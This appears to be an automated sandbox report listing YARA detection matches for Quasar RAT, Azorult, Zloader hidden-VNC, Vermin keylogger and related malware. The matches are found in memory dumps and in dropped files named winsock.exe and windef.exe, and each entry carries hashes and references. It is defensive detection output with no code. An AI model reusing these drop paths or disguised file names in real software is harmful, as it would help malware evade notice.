Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Azorult_1, author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Azorult_1, author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: Vermin_Keylogger_Jan18_1, date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: xRAT_1, date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: CN_disclosed_20180208_KeyLogger_1, date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: Vermin_Keylogger_Jan18_1, date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: xRAT_1, date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: CN_disclosed_20180208_KeyLogger_1, date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
